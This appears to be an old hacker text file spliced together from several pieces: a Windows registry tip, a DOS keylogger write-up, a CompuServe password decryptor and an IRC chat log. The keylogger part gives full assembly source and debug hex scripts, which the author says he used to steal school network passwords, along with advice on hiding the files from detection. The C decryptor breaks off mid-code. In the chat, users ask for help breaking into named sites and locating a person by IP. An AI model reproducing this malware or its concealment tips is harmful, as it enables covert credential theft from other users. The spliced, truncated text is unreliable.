Bin.{645FF040-5081-101B-9F08-00AA002F954E} Brief Case.{85BBD920-42A0-1069-A2E4-08002B30309D} Internet Explorer.{871C5380-42A0-1069-A2EA-08002B30309D} DUN.{a4d92740-67cd-11cf-96f2-00aa00a11dd9} Task Scheduler.{D6277990-4C6A-11CF-8D87-00AA0060F5BF} Recognise the layout? None of these are actually folders, and therefore do not have a desktop.ini file associated with them. For example, Control Pannel is stored as a series of files named .cpl in your \windows\system folder which can all be accessed individually. The program which puts each of these components into their 'folder' is called control.exe and is located in the root of your windows folder. But searching for the string 'clsid' in your registry will spew out a lot of interesting material. Obviously you'll have to wade through all the crap to get to it, as a lot of information about the way that Windows operates is stored in this way. The uses for these are practically limitless. Your sysadmin has probably limited access to most of this stuff, so you can just make yer own copies of the stuff. Having tried many ways of getting a difinitive list of these files, its actually made pretty damn difficult for you. 'dir /s /ah desktop.ini' returns 2 files, and needless to say Windoes Find is worse than useless, 'attrib /s > file.txt' and searching the file for the string desktop.ini gets most of them, but for some reason fails to locate some. Try them both to see what I mean. If anybody can get any better results than this, please contact me (ergophobe@dial.pipex.com). And the moral, the registry holds the key (sorry bad pun) to just about everything in Windows. Leave no stone unturned. ergophobe ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù º º ù L A M E L O G ù º º ù b y E X E - G e n c y ù º º ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù ù º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ The two LameLog programs are key trapping programs. Key trapping is the process of hooking a keyboard interrupt, intercepting all the buttons pressed by the user and writing them to a file. Programs such as these are extremely useful for finding user names and passwords. I only wrote this lame program to get some passwords on my school network because I didn't have access to the internet at the time and therefore couldn't get hold of a decent key trapping program. The first program (LAMELOG1) must be run before the login screen program and will keep a buffer of the key pressed. The second program must be run after hte security program and will write all of the keys to a file (test.log). ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Interrupt hooking ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ As every assembly programmer should know, there are two different interrupts used to service the keyboard: INT 09h and INT 16h. INT 09h provides low level access and lets us detect 'special keys' like CTRL, ALT, SHIFT, CAPS LOCK etc. INT 16h provided a wide range of easy-to-use functions that allows high-level access to the keyboard. We will be installing own INT 09h handler that will collect all key presses and dump them to a file. We will also be installing our own INT 21h handler, that lets us check memory residency and the position of the buffer in memory. Below is a list of the functions and return values for the two new interrupt handlers. INT 21h AX = F0001h returns AX = 1234h if LAMELOG1 is resident in memory. INT 21h AX = F0001h returns BX = Length of buffer DX = Offset of buffer ES = Segment of buffer ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Using the two programs ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Simply call LAMELOG1 before the security program, and LAMELOG2 after it. For example, the AUTOEXEC.BAT file would be: @echo off keyb mouse (etc) cd\ lamelog1 security software lamelog2 Make sure that the two files are either in the root directory or in one that is included in the system PATH or there will be a few 'bad command or filename' messages on boot-up. It would also be a good idea to rename the two files to something less suspicious such as keyboard drivers etc. as well as giving them the ATTRIB +H treatment. Before the program can work successfully, there must be a file called TEST.LOG in the root directory. After a few boot ups, open the file using a hex-editor, and you will be able to see all scan codes for key presses. If you've got access to the system files then the security must be pretty shite and you have nothing to gain by using other peoples passwords. You should, however, remember that a user may be using the same logon password as that for a unix account, ISP account etc. The only knowledge I have of assembly language, has been gathered by reading virus programming tutorials and source codes. It is for this reason that many of the techniques used (especially the interrupt hooking, interrupt handling and residency calls) resemble viral code and will trigger heuristic AV programs. Have fun and don't get caught. Um! When reading keys from the keyboard port, you don't get nice ascii numbers (like 65 for A etc.) but complex scan codes, instead. It is not immediately obvious what these codes represent, so I've included a table of the most common key presses. The first hex byte is the code generated when the key is pressed while the second byte corresponds to the code generated when the key is released. a 1Eh 9Eh | n 31h B1h | 1 02h 82h b 30h B0h | o 18h 98h | 2 03h 83h c 2Eh AEh | p 19h 99h | 3 04h 84h d 20h A0h | q 10h 90h | 4 05h 85h e 12h 92h | r 13h 93h | 5 06h 86h f 21h A1h | s 1Fh 9Fh | 6 07h 87h g 22h A2h | t 14h 94h | 7 08h 88h h 23h A3h | u 16h 96h | 8 09h 89h i 17h 97h | v 2Fh AFh | 9 0Ah 8Ah j 24h A4h | w 11h 91h | 0 0Bh 8Bh k 25h A5h | x 2Dh ADh | l 26h A6h | y 15h 95h | m 32h B2h | z 2Ah ACh | space 39h B9h enter 1Ch 9Ch shift 2Ah AAh backspace 0Eh 8Eh For example, should someone press 'S' three times, then hold down 'T' then press enter, you would get: 1F 9F 1F 9F 1F 9F 14 14 14 14 14 94 1C 9C À S Ù À S Ù À S Ù ÀÄÄÄÄÄÄ T ÄÄÄÄÄÄÙ ÀENTÙ If you want to know the scan codes for keys other than those listed above (such as F1-F12, cursor keys) you'll have to experiment by yourself. Warrantly notice: I cannot stress how buggy and lame theses two programs are. If you want a decent key trapping program, for gods sake, go and find one on the internet. All of the ones I've seen on the internet since writing this program were much better. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ L A M E L O G 1 . A S M s o u r c e c o d e ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ; To compile: ; TASM LAMELOG1 ; TLINK /T LAMELOG1 prog segment assume cs:prog, ds:prog org 0100h ProgStart: jmp GoResident ; Jump past INT 09h handler NewInt09hHand: pushf ; Save flags register push bp ; Save BP push ax ; Save AX push bx ; Save BX push cx ; Save CX push dx ; Save DX push ds ; Save DS push es ; Save ES push cs ; Save CS push cs ; Save CS pop ds ; Pop CS to DS pop es ; Pop CS to ES in al, 60h ; Read character from keyboard port mov bp, BufferLength ; Put bufferlength into BP mov byte ptr Buffer[bp], al ; Put AL (char) into array inc bp ; BP++ cmp bp, 1001 ; If BP=1001 jne UpdateBufferLen mov bp, 00h ; Set BP to zero UpdateBufferLen:mov BufferLength, bp ; Move BP to Bufferlength pop es ; Restore ES pop ds ; Restore DS pop dx ; Restore DX pop cx ; Restore CX pop bx ; Restore BX pop ax ; Restore AX pop bp ; Restore BP popf ; Restore flags OldInt09hHand: db 0EAh ; Code for jmp far OldInt09hOff dw 0000h ; Offset of old INT 09h handler OldInt09hSeg dw 0000h ; Segment of old INT 09h handler NewInt21hHand: pushf ; Push flags cmp ax, 0F001h ; If AX=F001h (Residency check) jne NextFunction ; Check for next function mov ax, 1234h ; Return 1234h to calling program popf ; Restore flags iret ; Return to calling program NextFunction: cmp ax, 0F002h ; If AX=F002h (Get segment/offset etc.) jne OldInt21hHand ; Jump to old handler ; Return Seg and Offset of buffer data push ds ; Save DS push cs ; Save CS pop ds ; Restore CS in DS mov bx, word ptr BufferLength ; Move buffer length to BX mov dx, word ptr BufferOffset ; Move buffer offset to DX mov es, word ptr BufferSegment; Move Buffer segment to ES pop ds ; Restore DS popf ; Restore flags iret ; Return to calling program OldInt21hHand: popf ; Restore flags db 0EAh ; Code for JMP FAR OldInt21hOff dw 0000h ; Offset of old int 21h handler OldInt21hSeg dw 0000h ; Segment of old int 21h handler BufferSegment dw 0000h ; Segment of key buffer BufferOffset dw 0000h ; Offset of key buffer BufferLength dw 0000h ; Length of key buffer Buffer db 1000 dup(0) ; Buffer (maximum of 1000 characters) GoResident: mov ax, 0F001h ; Check if LAMELOG1 is already resident int 21h ; Call DOS interrupt cmp ax, 1234h ; If AX==1234h then LAMELOG1 is already TSR je Exit ; ...and therefore end program push cs ; Save CS register pop ds ; Restore CS register into DS mov BufferSegment, ds ; Move DS to BufferSegment lea ax, Buffer ; Load address of Buffer to AX mov BufferOffset, ax ; Store AX in BufferOffset mov ax, 3509h ; Get current Seg/Off of current 09h handler int 21h ; Call DOS interrupt mov OldInt09hOff, bx ; Move old Int09h Off to OldInt09hOff mov OldInt09hSeg, es ; Move old Int09h Seg to OldInt09hSeg mov ax, 3521h ; Get current Seg/Off of current 21h handler int 21h ; Call DOS interrupt mov OldInt21hOff, bx ; Move old Int21h Off to OldInt21hOff mov OldInt21hSeg, es ; Move old Int21h Off to OldInt21hOff mov ax, 2509h ; Set new Int 09h lea dx, NewInt09hHand ; DX=Offset of NewInt09hHandler int 21h ; Cass DOS interrupt mov ax, 2521h ; Set new Int 21h lea dx, NewInt21hHand ; DX=Offset of NewInt21hHandler int 21h ; Cass DOS interrupt lea dx, ProgramEnd ; Set DX to end of program int 27h ; Go TSR Exit: int 20h ; Return to operating system ProgramInfo db 'LameLog1 written by EXE-Gency' ProgramEnd: prog ends end ProgStart ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ L A M E L O G 1 d e b u g s c r i p t ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ If you don't have TASM and TLINK, just copy the following to a text file and type: debug < filename and a file called 'lamelog1.com' will appear N LAMELOG1.COM E 0100 E9 48 04 9C 55 50 53 51 52 1E 06 0E 0E 1F 07 E4 E 0110 60 8B 2E 61 01 3E 88 86 63 01 45 81 FD E9 03 75 E 0120 03 BD 00 00 89 2E 61 01 07 1F 5A 59 5B 58 5D 9D E 0130 EA 00 00 00 00 9C 3D 01 F0 75 05 B8 34 12 9D CF E 0140 3D 02 F0 75 12 1E 0E 1F 8B 1E 61 01 8B 16 5F 01 E 0150 8E 06 5D 01 1F 9D CF 9D EA 00 00 00 00 00 00 00 E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0540 00 00 00 00 00 00 00 00 00 00 00 B8 01 F0 CD 21 E 0550 3D 34 12 74 3B 0E 1F 8C 1E 5D 01 B8 63 01 A3 5F E 0560 01 B8 09 35 CD 21 89 1E 31 01 8C 06 33 01 B8 21 E 0570 35 CD 21 89 1E 59 01 8C 06 5B 01 B8 09 25 BA 03 E 0580 01 CD 21 B8 21 25 BA 35 01 CD 21 BA AF 05 CD 27 E 0590 CD 20 4C 61 6D 65 4C 6F 67 31 20 77 72 69 74 74 E 05A0 65 6E 20 62 79 20 45 58 45 2D 47 65 6E 63 79 RCX 04AF W Q ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ L A M E L O G 2 . A S M s o u r c e c o d e ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ; To compile: ; TASM LAMELOG2 ; TLINK /T LAMELOG2 prog segment assume cs:prog, ds:prog org 0100h ProgStart: mov ax, 0F001h ; Is LAMELOG1 resident? int 21h ; DOS interrupt cmp ax, 1234h ; If AX==1234h then LAMELOG is resident je OpenFile ; then jump to 'OpenFile' label mov ah, 09h ; 09h==DOS function to write to screen lea dx, NotResident ; DX==Offset of 'No TSR!' message int 21h ; Call DOS interrupt jmp Exit ; Jump to end of program OpenFile: mov ah, 3Dh ; 3Dh==DOS function to open file mov al, 02h ; Open file for writing lea dx, LogFilename ; DX==Offset of filename 'TEST.LOG' int 21h ; Call DOS interrupt jnc SeekEOF ; If no error then jump to label 'SeekEOF' mov ah, 09h ; DOS Function to write to screen lea dx, BadFile; DX==Offset of 'Bad file!' text string int 21h ; Call DOS interrupt jmp Exit ; Jump to end of program SeekEOF: xchg bx, ax ; Move file handle from AX to BX mov ah, 42h ; 42h==DOS function to seek position in file mov al, 02h ; 02h==EOF mov cx, 0000h ; Most significant part of offset mov dx, 0000h ; Least significant part of offset int 21h ; Call DOS interrupt WriteStart: mov ah, 40h ; 40h==DOS function to write to file mov cx, 09h ; CX==Number of bytes to write lea dx, StartString ; DX==Offset of 'START' string int 21h ; Call DOS interrupt push bx ; Vale file handle for a moment mov ax, 0F002h ; Get Seg/Offset/Length of buffer from ; LameLog1 program resident in memory int 21h ; Call DOS interrupt ; bx=BufferLength ; es=BufferSegment ; dx=BufferOffset mov cx, bx ; Move length of buffer into CX pop bx ; Restore file handle from stack push ds ; Save DS register push es ; Push ES register to stack pop ds ; Restore ES into DS (mov ds, es) mov ah, 40h ; Write to file int 21h ; DOS interrupt pop ds ; Restore DS register mov ah, 3Eh ; 3Eh==Close File int 21h ; Do it. Exit: int 20h ; Call int 20h (return to OS) NotResident db 'No TSR!$' BadFile db 'Bad file!$' StartString db 0Dh, 0Ah, 'START', 0Dh, 0Ah LogFilename db 'test.log', 00h ProgramInfo db 'LameLog2 written by EXE-Gency' prog ends end ProgStart ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ L A M E L O G 2 d e b u g s c r i p t ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ If you don't have TASM and TLINK, just copy the following to a text file and type: debug < filename and a file called 'lamelog2.com' will appear N LAMELOG2.COM E 0100 B8 01 F0 CD 21 3D 34 12 74 0A B4 09 BA 57 01 CD E 0110 21 EB 42 90 B4 3D B0 02 BA 72 01 CD 21 73 0A B4 E 0120 09 BA 5F 01 CD 21 EB 2D 90 93 B4 42 B0 02 B9 00 E 0130 00 BA 00 00 CD 21 B4 40 B9 09 00 BA 69 01 CD 21 E 0140 53 B8 02 F0 CD 21 8B CB 5B 1E 06 1F B4 40 CD 21 E 0150 1F B4 3E CD 21 CD 20 4E 6F 20 54 53 52 21 24 42 E 0160 61 64 20 66 69 6C 65 21 24 0D 0A 53 54 41 52 54 E 0170 0D 0A 74 65 73 74 2E 6C 6F 67 00 4C 61 6D 65 4C E 0180 6F 67 32 20 77 72 69 74 74 65 6E 20 62 79 20 45 E 0190 58 45 2D 47 65 6E 63 79 RCX 0098 W /********************************************************************* * * * COMPPASS.C by EXE-Gency * * A program to find the compuserve password on a windows machine by * * searching the C:\WINDOWS directory for the CIS.INI file that * * contains the encrypted password. The encryption routine was taken * * from an old file by Gnasher from the Electronic Terrorism Group. * * * * If you want to compile the source code yourself you'll need a * * copy of DJGPP: * * * * GCC -O COMPPASS.EXE COMPPASS.C * * * *********************************************************************/ #include "stdio.h" #include "process.h" #include "string.h" #include "ctype.h" unsigned int GetDec(char C[2]); // Function that returns the integer value // of a two character hex digit int main() { FILE *File; char String[200], *Ptr1, *Ptr2; unsigned int Counter1, Decimal; char TwoChar[2]; unsigned char Key[24]={198,253,199,161,237,251, // Keys for each char 182,254,227,219,245,190, 186,239,221,247,171,198, 253,199,161,237,251,182}; printf("COMPPASS v1.0 EXE-Gency. Program to get compuserve password.\n"); if((File=fopen("CIS.INI", "r"))==NULL) { // Carnt open file CIS.INI in current directory for reading printf("Cannot find file CIS.INI in current directory!\n"); printf("Aborted"); exit(1); // Quit to OS } while(!feof(File)) { fgets(String, 199, File); // Read string Ptr1=strstr(String, "Password"); // Is 'Password' in string? if(!(Ptr1-String)) { // Yep! printf("Encrypted %s", String); Ptr1=String; Ptr2=String; Ptr1+=9; while(*Ptr1) { // Copy string *Ptr2=*Ptr1; Ptr1++; Ptr2++; } *Ptr2=*Ptr1; printf("True Password="); for(Counter1=0; Counter1 Hi is there any exploit for FTP'S? yeah you can use an anonymous login to get the password file on some UNIX boxes I did that but, is shadowed. and I can't get the shadow passwd file spank it thats your only chance with a big ugly stick spank it true spank? yeah you never heard of the spank technique? you some kinda lamer? never man ?? nope shit dood spanking is the ultimate in teqneek hells yeh *** BL4Z3 has joined #hackphreak that's why I don't know that technique cause I have a lot of time out oh now Im here again heh oh well take a lot of time, especially the monkey spanking teqneek when I find text's about that? ohhh thats the ultimate in spank tecnoloG HuSoft, you think you can learn how to spank your monkey? I can learn whatever *** BL4Z3 has quit IRC (Leaving_) cool I think theres even an rfC file on the spank teknique and where can I find it? *** dork has quit IRC (quitting.c_) well, it's quite easy to find really yeah? go to www.lamer.com I think it's there nerd, would you agree with that? yeah definately oh nerd it's there in there text section no it's a real site for learning shit ok yeh go there yeh, real shit click on there text file like like=link ok and look for rfc666 *** tofus has joined #hackphreak or it might have been rfc 420 yeh, that sounds right, though i heard the nsa were going to classify the rfc fuck the nsa their wimps they're even ;p *** niscii has joined #hackphreak * tofus 0wns the nsa *** Zio has joined #hackphreak *** W sets mode: +o Zio tofus, we were discussing the rfc on the spanking teqneek hey nerd, there is all about MP3! hmmm aha the spanking teqneek yes *** rUdi^baiK has quit IRC (Ping timeout for rUdi^baiK[p-h-h.com]_) ph33r my kungfu 5k1LL2 maybe that wasnt the site specifically relating to monkey spanking, HuSoft is going to learn to spank the monkey yeah it complicated tho he needs an rfc for it that sucks, dude! yeah oh well I can't rerally remember the site maybe it was www.lamour.net or something........ try shit like that or lamer.co.uk dudes, gotta hover...gotta catch a train surf.to/lamer I found it in other place nerd * tofus catches a train; 3 men out, changing sides *** tofus has left #hackphreak *** SEPULTURA has joined #hackphreak or, you could try the search engine on antionline.com, search for monkey spanking and you should get plenty of hits, a few of the antionline people are real monkey spankers anyone know something about POP3? I found it on YAHOO yeah.....it's by far the best technique *** helpmeplz has joined #hackphreak well read up man learn it well http://www.medismk.net/cgi-bin/vreme.pl ->Can someone tell me what is this and how can I brake into this ? as in can we all hack it for you no walrus, you should message HuSoft about the technique he is learning, it may help you oops http://www.medismk.net/html/login1.htm ->What about this can someone brake here ?? *** g_RaX has joined #hackphreak i ment to say helpmeplz, you should message HuSoft about the technique he is learning, it may help you thank you you are forgiven MOSSAD.ORG is workinh only on POP3 and HTTP anyone can help me to find backdoor? msg me well with HuSoft off spanking his monkey, we will need a new diverion *** niscii has left #hackphreak *** d0nt has joined #hackphreak *** AlphaVers has joined #hackphreak howdyz *** SEPULTURA has quit IRC (Ping timeout for SEPULTURA[RAS2-p110.rlz.netvision.net.il]_) *** dimak has joined #hackphreak hello huSoft I am here HuSoft is off spanking his monkey he's learning to. He's not quite mastered it true, he probably still hasn't quite come to grips with it yet he's learning how to spank his monkey? or did i miss something again? he will truly learn the value of in depth knowledge of the end knob and it's principal purpose can you help me with a problem? AlphaVers, no you got it right, he is learning to spank his monkey cool I heed to understand IPv4 address and find out the exact location of e person, can anyone help me? dimak, ask HuSoft about monkey spanking I heed to understand IPv4 address and find out the exact location of e person, can anyone help me? *** symbolik has joined #hackphreak uNFuNFuNF dimak, you also need to learn about themonkey spanking teqneek _i_nxs_,_ you got the log from that night? which nite? ? the one we were fightin in here think it was you hehe i doubt it i mean i doubt i have the log can you help me with the problem? msg husoft about the spank technique dimak, i told you, message HuSoft and ask him how to spank the monkey the spank technique covers a wide range of areas it's neat when people say they code and then they say things like this... [Letsdoit(letsdoit@209-145-180-74.accessus.net)] cobol assemblier fortran systems design to name a few *** CaPe-ZeD has joined #hackphreak *** W changes topic to 'Welcome to #HackPhreak, Lectures are currently on hold (hackphreak.org)_' makes me giggle makes me puke heh ya that too and i dont code i wish i had been logging tonite I am i could have spared a few meg for the idiocy of the evening i wish i logged period makes for funny bedtime stories wish i had been logging myself for the past week never been drunker in all my life has trav talked at all tonight? hrm no dang I heed to understand IPv4 address and find out the exact location of e person, can anybody help me? please dimak, have you learned how to spank your monkey yet? the spank technique cobers IPv4 as well as password files covers even i think it also has a primer on ipv6 and possibly location teqneeks using ipv4 its very versatile wait, dimak doesn't know the spank technique yet? http://www.medismk.net/html/login1.htm ->What about this can someone brake here it's linked to http://StNaum.medismk.net/cgi-bin/qqqq/login.cgi?? true that's why its so complex AlphaVers, doesn't look like it dude, that's basic knowledge you won't get nowhere without knowing it helpmeplz, you would make a good monkey spanker, you also should learn the teqneek if only JP was here, i am sure he would teach these peasants how to spank the monkey JP is a true sensei of monkey psanking spanking Dear, what am I to do? dimak, easy, learn how to spank where? mail jp@antionline.com about it he knows thanx inxs hey, good idea yeah. He's a really good spanker in fact, i think that will work *** genux has joined #hackphreak http://www.medismk.net/html/login1.htm ->What about this can someone brake here it's linked to http://StNaum.medismk.net/cgi-bin/qqqq/login.cgi?? you have to ask nice though, he doesn't like teaching so if you don't ask him right, he won't reply or feed you some bullshit next one to repeat a question, who has not availed themselves the oppurtunity to learn monkey spanking from JP, gets banned back in a bit, a rugby game on tv *** b00ze has joined #hackphreak ok I will mail him, but is it possible to know to decode IP right now? not without learning 'spank' hey people from #HACKPHREAK!!!!!!! RFC specifies an IAB standards track protocol for the Internet community, and requests discussion and suggestions for improvements. Please refer to the current edition of the "IAB Official Protocol Standards" for the standardization state and status of this protocol. Distribution of this memo is unlimited. heh ;) I found it you need an ip decoder, which requires knowledge of the spank technique to use ok yeah. You can code spank programs in BASIC hi ppl in order to decode an ip you need to know the spank level of it damn, maybe some can help me to understand just one IP address, I need it promtly, I need to hfind one my friend that's why you need to know how to spank right but spanking isn't for everyone..... spanking makes the difference between hackers and lamers yeah. Most girls are crap at spanking some people just can't handle it's raw power guys, can you decode the IP for me? sure, what is it? will it take much time? yeah. That's why it helps to write a spank program in BASIC nah not really it makes it easier dimak, what's the ip? yeah. Tell us the ip and we'll help you out a little spanking is much easier with basic......using tools to enhace the spank teqnique is the only way AlphVers, X-Originating-IP: [128.252.61.5] you see b00ze's ip was 202.163.254.105 that's spank level 8 ain't it? dimak: that has a spank level of 1 because the first digit is 1 this may take a while after all dood spank level8?? oh hang on, the 3rd digit is 8 oh yeah. Got a bit confused there sorry. SPANK LEVEL 8!!! oh well fuck lemme get my spanker b00ze would've been easier to hack 'cause it was only a level 2 spank 202.163.254.105 you see spank level 2 but spank level 8!!! that's gonna be tricky dimak, are you sure that's correct? i can't spank the sequence out of it spank level 8 thats some 3331337 shiznit yes, i got from e-mail that was maild from Hotmail wow hotmail? uhoh so your familiar with the spank protocol? hotmail has it's own way of spanking *** guji has joined #hackphreak you'd need a hotmail decoder for it i got a message from hotmail, it has IP address in properties where I can get it? *** Tr|cky^ has joined #hackphreak yeah. Spank level 8 ips never change *** Tr|cky^ has left #hackphreak *** guji has left #hackphreak and the hotmail spank level 8 is even more difficult wait you need to do some pretty difficult BASIC coding to spank that one man there it is now those hotmail admins know how to spank think i got something here what is it I've never got a spank level 8 before washington university in st louis yeah I've never actually encountered a spank level 8 either or atleast, that's the last hop before the monkey puked ohhh dammit I hate premature termination i assume they own the entire spank range The problem is that he probley bounced, 'cause you only get spank level 8 for companies and stuff if they do, that's where it came from AV, How did you get that? the exact name of the location? I thoght it should have been geographical not home users dimak, by spanking the monkey of course it gave you the university name? *** Odyss3us has joined #hackphreak yup it looks like it came from somewhere on the east side of campus not sure could be south-east too well the monkey spank protocol is quite wily it can get kinda hairy if your not familiar with it's proper usage...I like to use standard spank nerd, come on standard spank sucks ok ok *** ratshat has joined #hackphreak call me old fasion I is greate. thank you very much, how can you tell me this, it is amazing, I hardly believe the ip can get such detailed info the thing is that hotmail spank is more secure you won't even get an address with a standard spank on an arp oh yeah by far and the monkey that hotmail spank uses for level 8 spank is more prone to 'puking' AlphaVers, do you have a kind of database for IP codes? yeah correct that premature termination is a bitch dimak, it's dynamicly created everytime i spank if i spank you for instance, it would create a database with info on you where is the initial information from? i forgot my password for a excel file anyone know a way around? but unauthorized spanking is kinda illegal I'd have to say that theis guy probably bounced 'cause a level 8 spank is not usually seen with a home user. He must've gone through an organisation, or that could just be the hotmail spank security why illegal? *** HuSoft has quit IRC (BrB..._) *** [tefx] has joined #hackphreak if would spank a cia agent 